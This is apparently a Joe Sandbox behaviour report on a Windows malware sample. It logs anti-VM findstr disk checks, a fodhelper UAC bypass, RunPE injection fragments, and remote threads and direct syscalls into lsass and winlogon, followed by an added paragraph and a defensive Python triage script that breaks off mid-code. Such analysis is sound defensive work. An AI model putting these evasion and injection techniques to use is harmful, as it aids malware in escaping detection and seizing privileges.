Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8
Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: cmd.exe, 0000002C.00000003.1584622401.0000015829838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" %
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdownLMEM XlH
Source: cmd.exe, 00000008.00000003.1323937809.0000021406B8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
Source: cmd.exe, 0000002C.00000003.1598274166.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597504148.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1607297299.0000015829834000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1606177800.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597979208.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1596938910.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597212934.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1596620569.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1607478751.0000015829834000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597899448.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1598713878.0000015829838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: e7WMhx18XN.exe, 00000001.00000002.1327169256.0000000001298000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF6718E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF6CF6718E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_004019E1 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap, 56_2_004019E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF671A8C SetUnhandledExceptionFilter, 12_2_00007FF6CF671A8C
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF671404 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF6CF671404
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Users\user\AppData\Local\Temp\paint.exe Memory allocated: C:\Windows\System32\conhost.exe base: 113DAF00000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 12BE3BE0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 21E7B340000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 236ACAA0000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 94_2_0000000140002434
Source: C:\Users\user\AppData\Local\Temp\paint.exe Thread created: C:\Windows\System32\conhost.exe EIP: DAF00000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: E3BE0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 7B340000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: ACAA0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 780000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 800000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 3B0000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 60382EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C7342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B91B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 918F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E962EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B8D72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 56DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9CCD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BAC02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C9D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B232EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27592EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9BDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 98F62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD782EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2B82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C1332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4092EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F61C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 112C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B1D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12F62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 115C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B4692EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9EBD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6682EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 905C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5A8E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC5B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 96182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D0B72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 55302EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 95822EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 54662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83092EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB1C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CACC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6DEC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1CA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E2272EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1BED2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 87922EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CCCC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 61F22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EEB32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 637D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1CC82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6EF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4B672EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30FF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5E02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35402EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 916A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C40A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FD82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3AC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A8F82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15782EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 693C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4CE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 126F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F17A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C22F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB972EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E91B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31C92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D43C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43A62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB372EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31822EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3642EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EA12EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2EBE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 96452EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A0382EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F392EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF032EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\cmd.exe EIP: D2922EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\conhost.exe EIP: EE52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B8A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BA02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EDA52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B5252EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B5252EBC
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtCreateThreadEx: Direct from: 0x401A17
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtWriteVirtualMemory: Direct from: 0x401D57
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtProtectVirtualMemory: Direct from: 0x401DD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtClose: Direct from: 0x401CD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtAllocateVirtualMemory: Direct from: 0x401D97
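The three kinds of lines around this point are the raw evidence behind the "Creates a thread in another existing process", "Found direct / indirect Syscall" and process-injection signatures in the summary: dozens of threads started in dllhost.exe whose EIP values share the same low 16 bits (2EBC, then 25AC) at different bases, a dropped sihost64.exe issuing NtAllocateVirtualMemory / NtWriteVirtualMemory / NtProtectVirtualMemory / NtCreateThreadEx as direct syscalls rather than through ntdll exports, and PE images (value starts with 4D5A, i.e. "MZ") written into winlogon.exe, lsass.exe, svchost.exe and the rest. The following Python is an added example, not part of the Joe Sandbox report or of the sample, that parses lines of exactly this shape and extracts those three signals so a responder can triage a long report rather than read it line by line. The embedded sample lines are copied from this report; the function names, the 16-bit mask and the three-hit threshold are my own choices, and the shared-low-bits test is a heuristic, not a rule.

```python
"""Triage Joe Sandbox behaviour lines: remote thread creation, direct Nt* syscalls
and PE images ("MZ" = 4D5A) written into other processes."""
import re
from collections import Counter, defaultdict

# Constructed sample: a handful of lines copied verbatim from the report above.
SAMPLE_LOG = r"""
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 637D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1CC82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\cmd.exe EIP: D2922EBC
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtCreateThreadEx: Direct from: 0x401A17
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtWriteVirtualMemory: Direct from: 0x401D57
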